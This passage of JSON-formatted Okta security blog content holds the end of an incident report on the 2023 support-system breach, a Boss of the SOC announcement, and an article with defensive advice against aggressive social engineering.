The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 customers, 3 of whom have shared their own response to this event.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The unauthorized access to Okta’s customer support system leveraged a service account stored in the system itself. This service account was granted permissions to view and update customer support cases. During our investigation into suspicious use of this account, Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop. The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Failure to identify file downloads in customer support vendor logs\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"For a period of 14 days, while actively investigating, Okta did not identify suspicious downloads in our logs. When a user opens and views files attached to a support case, a specific log event type and ID is generated tied to that file. If a user instead navigates directly to the Files tab in the customer support system, as the threat actor did in this attack, they will instead generate an entirely different log event with a different record ID.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s initial investigations focused on access to support cases, and subsequently we assessed the logs linked to those cases. 
On October 13, 2023, BeyondTrust provided Okta Security a suspicious IP address attributed to the threat actor. With this indicator, we identified the additional file access events associated with the compromised account.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Investigation Timeline\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 1Password reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 Okta Security begins an investigation, suspecting that 1Password was most likely the victim of malware or a phishing attack.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 to 2023-10-02 Okta Security meets with 1Password on 9/29, 9/30, 10/1 and 10/2 in an attempt to resolve their support case.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-02 BeyondTrust reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-02 to 2023-10-11 Okta Security meets with 1Password and BeyondTrust multiple times from 10/2 to 10/11.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-12 A third customer reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-13 BeyondTrust provides Okta Security an indicator of compromise (IP address) associated with the event they reported to Okta Support on 
10/2.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-16 Using the supplied IP address, Okta Security identifies a service account associated with previously unobserved events in the customer support system logs.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security disables the service account and terminates associated sessions.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security copies and examines all files identified in the customer support system logs that were accessed by the threat actor. 134 Okta customers or less than 1% of Okta customers had a file accessed by the threat actor.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security revokes the Okta session tokens embedded in the HAR files.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security investigates whether the threat actor attempted to access customer Okta instances using these files.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-18 Okta Security notifies a fourth Okta customer targeted by the adversary.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-18 Okta Security identified a gap in the logs from the customer support system, missing the final hours that the threat actor had access. 
A re-run query now returns a complete picture of adversary activity.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security identifies additional files downloaded by the threat actor that were not previously discovered due to the delay in receiving the logs.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security revokes the Okta session tokens embedded in the newly discovered HAR files that had been downloaded by the threat actor.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security identifies Cloudflare as the fifth and final Okta target of the adversary.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta alerts all Okta customers with registered security contacts, confirming if they were or were not impacted by the security incident.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-20 Okta publishes public advisory at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/harfiles\"},\"content\":[]}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-20 to 2023-11-02 Okta is focused on helping all customers, answering their questions and rolling out remediation 
steps.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-11-02 Okta notifies all Okta customers with registered security contacts of the root cause and remediation steps.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-11-03 Okta publishes root cause and remediation steps at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/harfiles\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://sec.okta.com/harfiles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Remediation Tasks\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Disabled the compromised service account (Complete)\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta has disabled the service account in the customer support system.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Blocking the use of personal Google profiles with Google Chrome (Complete)\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta has implemented a specific configuration option within Chrome Enterprise that prevents sign-in to Chrome on their Okta-managed laptop using a personal Google profile.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"3. 
Enhanced monitoring for the customer support system (Complete)\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has deployed additional detection and monitoring rules for the customer support system.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Binding Okta administrator session tokens based on network location (Complete)\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has released session token binding based on network location as a product enhancement to combat the threat of session token theft against Okta administrators. Okta administrators are now forced to re-authenticate if we detect a network change. This feature can be enabled by customers in the early access section of the Okta admin portal.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.442Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. </p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. 
He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/BOTS2023","id":"192188d0-ff6c-5225-9344-103bf229c0d9","title":"Study up on Okta Logs for Splunk’s Boss of the SOC!","date":"2023-07-06T07:21:51+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security is pleased to announce another collaboration with our friends at Splunk - our security teams have joined forces to come up with a range of Okta-relevant scenarios for this year’s “Boss of the SOC” competition at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk .conf23\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Per Splunk,\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Boss of the SOC (BOTS) is a blue-team capture the flag-esque competition. As a contestant, you will explore and investigate realistic event data in Splunk Enterprise and Splunk Enterprise Security. 
The questions in BOTS range from easy to hard and everything in between. Every question comes with hints to nudge you in the right direction. If you need more help, coaches are onsite and online to assist when the hints run out. Also — don't forget — BOTS is a team sport, so if you bring your crew, you won't be alone.\\\"\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"This means that events from the Okta System Log will be relevant to several challenges. While the Okta Security team doesn’t have first-hand knowledge of what the challenges will include (Splunk keeps that close to their chest), we can suggest a few resources to get a better handle on Okta System Log:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Type Reference\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" docs at developer.okta.com\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Blog post: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Sign-in and Recovery Events in Okta System Log\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Blog Post: 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We’d also like to invite you, in either your physical or virtual form, to view “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://conf.splunk.com/sessions.html?search=okta#/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SEC1747B - If You Give an Adversary a Cookie…\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"”, where Okta’s Matt Egan and Splunk’s James Brodsky will showcase our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"shared detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as well as insights from our “Boss of the SOC” collaboration.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We wish all participants the best of luck!\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"PS - Did you know \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is now globally available? Log Streaming enables admins to more easily and securely send System Log events to Amazon EventBridge or Splunk Cloud in real-time with simple, pre-built connectors. 
No Admin API token required!\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.321Z","secAuthor":[{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"<p>John leads the EMEA node of Okta's Detection and Response Engineering team.</p>\n\n<p>His team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"},{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"<p>Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.  
</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/articles/2023/07/social-engineering-getting-more-extreme-fixes-can-be-simple","id":"a089c614-4a71-51f6-86d0-82d1aa3da19e","title":"Social Engineering is Getting More Extreme, but the Fixes Can Be Simple","date":"2023-07-19T18:14:39+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Social engineering is a hacking technique older than the internet itself, and it's tempting to think you've already seen it all. But recently, we've noted a trend among threat actors pursuing more sophisticated and aggressive techniques to trick, or even threaten, users into performing their desired actions. Their campaigns are convincing, brazen, and at times alarming. In this blog post, we want to talk about some of the techniques we've seen (or been made aware of) and provide some practical advice that you can use to defend your employees and organizations.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"First off, you should note that the days of bad movie villain accents and emails filled with blatant typos from far flung international princes are coming to an end. Those attempting to breach systems are now proficient in corporate lingo and they put in the time and research to sound as authentic as the person at the desk next to you. You can expect them to know your internal tools, terminology and name drop your fellow employees with ease. 
This is the “confidence” portion of any confidence scam, the person on the other end of the line needs to make you feel like they have all the answers, and they need your help, immediately. And it’s this sense of “immediacy” that most social engineering attempts are going to rely on, preying on your desire to be helpful.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Imagine yourself on the end of this call:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Quick do this for us, install this, we don’t have time to ask questions, hurry!”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Minutes later, you’ve given up a password, login, or access to your system because you were pressured to do so. As you hang up the phone, you get a weird feeling, that little tingle in the back of your brain that tells you something was “off” about the entire interaction ...\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Before we get to our advice on this front, let’s review another real-life scenario we’ve seen play out. This is the tale of the business networking site, and we’ll place you in the mind of the intended target.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Just imagine, it’s a rainy day, and you’re on LinkedIn looking into what your current and past colleagues are doing for work these days. 
You’re browsing the site when you receive a message from someone you used to work with.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Hey,” they lead off their message with, “I’ve heard through the rumor mill that you’re being investigated. I personally told them there’s no way, you’re too honest, but I just wanted to warn you that you might hear from the security team!”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You push the chair back from your desk, massively confused. Investigated? For what? You left that company months ago. You search your memory, trying to recall your relationship to the person who just messaged you, as well as what on Earth they might be talking about. Then an email arrives in your personal inbox, and this time from someone identifying themselves as security where you used to work, and it includes a link to a document for you to sign too, an NDA.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Can you please give me a call? We have some questions we’d like to ask you.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Frightened and concerned, you pick up your mobile device and dial. Now you're way more than halfway down the rabbit hole of granting someone access to your information. You’re clicking links, interacting with the adversary, and moving right down the path of a poor outcome.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The above hypothetical is in fact a real situation, and one that’s gaining popularity with bad actors. 
The social engineer has established a convincing pretext, and naturally you don't want to seem dishonest or evasive.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"And when you consider the tools they're using, you know DocuSign, where the NDA .pdf came through, and you’re on LinkedIn all the time. We've also seen threat actors \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"leveraging GitHub\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" as well. What you’re not taking into account is that the adversary in question has credentialed themselves through your prior co-worker’s account, with a username and password they could easily have obtained through a data leak. Then they’ve set themselves up for step two, the contact phase, prepping your mind to accept their version of events and motivating you to clear your good name.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The adversary hasn't given you a moment to stop and think about where this is coming from, and why a previous employee would reach out to you via a third party. By not giving you the time to pause and ask questions, they’ve also created a false sense of urgency. Of course you want to be helpful, so you don’t mind talking to security, because what do you have to hide? You’re innocent! 
But this desire to demonstrate your innocence, combined with a series of carefully fabricated events designed to place you on the defensive, can only lead to a poor outcome for you - and your employer.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Now let’s turn our attention to an even more cruel method of exploitation, threatening your loved ones. You receive a call at your desk at noon on a Thursday, and the voice on the other end of the line says they have your cousin Ali, and if you don’t do exactly as they say there’s going to be trouble. You’re shaken, and you ask what they could possibly want?\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"blockquote\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"“Just install the software I’m emailing you and everything will be fine.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You double click a few times and they hang up. Wait, what just happened? Is your cousin safe?\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Of course, the idea of social engineering itself isn’t new or novel. 
We’ve written about \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/scatterswine\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"these types of activities in the past\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and we’ve seen widespread messaging of employees (and even family members of employees) in the past.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"However, the current landscape indicates that threat actors are rapidly escalating both the level of their threats and the intimacy of their claims. Take a moment and consider the amount of information about you that is already out in the world. Are you on social media? The aforementioned business networking sites? Message boards? Ever applied for a business license or had personal information involved in a data breach? There are an incredible variety of ways to interact with the internet, and we do them all, but because of that it can be easy to form a composite of what’s important to us, as well as our specific connection to friends and family. Which is exactly the type of information that sophisticated adversaries will use to apply pressure and instill urgency. It’s this sense of urgency and intimacy that you should be aware of going forward.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Thus concludes the, “you wouldn’t believe the things we’ve seen” portion of this article. Now let’s talk about the steps you and your company can take to avoid these types of interactions, with the positive news being that the fixes are readily available and easy to implement. The fixes here aren’t hard, won’t require millions of dollars, and can lead to easy wins. The methods we’ve described are attempts at getting past your intrusion detection. 
Culturally, there are steps that you can take to build an environment that’s less likely to be a victim of social engineering.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Anticipate the adversary\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"You should expect and anticipate that adversaries will attempt to imitate the service or IT support desk. As such, what can enterprises do to differentiate the help desk from any random caller? Can your employees research who they are talking to on a company intranet? Can they ask to call the person back at the number that’s provided on your internal support pages? Every company is different - the information available to your employees will be different and therefore the processes you recommend will be too, but companies should have a defined verification process that their user base can leverage when IT support or security staff reach out to them. We don’t need people to become paranoid, but a mindset of ‘trust, but verify’ best practices for verification of callers (call back by known helpdesk number, visual match against org directory, etc.) can improve your security posture.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Have well-known procedures\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In turn, it's important that the security and IT teams collaborate on an agreed process for safely providing remote support to users, and an unwavering commitment to following that process. Your security awareness program needs to communicate and set expectations to users on how they can validate the identity of helpdesk or security staff. 
It’s also worth considering having a security program where you’re not asking people to download software overall.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Security culture matters\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Speaking of security awareness: never “punish” a user for asking questions of security or support teams. Instead, build a culture of security awareness and curiosity to encourage a healthy skepticism in your users. At this point, we know that adversaries have playbooks, including full scripts, on how to manipulate unsuspecting users into giving them information they can use. The culprits in this situation want the entire scheme to proceed quickly, without anyone having time to ask questions. Tell your users it’s okay to slow things down if they don’t understand what’s happening. Remember there is a power dynamic at play here, an emotional one, but when someone is asking you to do something you have the power in this situation, not them. Furthermore, you should encourage your security people to want to have conversations with everyday users, as well as having a photo and a phone number associated with their internal work profile.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"4. All hands on deck!\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Encourage and reward your employees for reporting social engineering attempts. They can be your eyes and ears, and an early warning system. Many organizations today have defined processes for reporting phishing emails, but do your people know that they should - and more importantly, know how to - report the types of approaches that we’ve talked about here today? Such attempts should be reported as soon as possible. 
And upon receiving such reports, your security team should work with other relevant parts of your business to ensure that your processes and advice to employees are sufficient for whatever the next creative permutation of these types of aggressive social engineering approaches looks like.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-3\",\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Downvote downloads\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Your security awareness program should make users skeptical of downloading software to their endpoint. Getting concepts like this out to your employee base could make all the difference. And if you can, consider locking down your environment overall by blocking all remote management and monitoring (RMM) tools, outside of a limited set endorsed for use by support/IT teams.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We should expect that in a well-configured environment, attackers will resort to more extreme variations of social engineering. We’re seeing variations on the above themes all the time. Which is why we all need to be extremely intentional about how we respond to requests, no matter who they appear to be from, or how urgent they may seem. There is no \\\"one size fits all\\\" solution here. Every company is different, and the information available to your employees will be different and therefore the processes you recommend will be too. The main takeaway? Make your people aware, because improved security awareness tends to lead to improved security results.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.106Z","secAuthor":[{"id":"94fa25fb-5f59-5711-92cc-f79d533ee5e2","bio":{"bio":"<p>Tim Peel leads Cyber Threat Research within Okta's cyber defence team. 
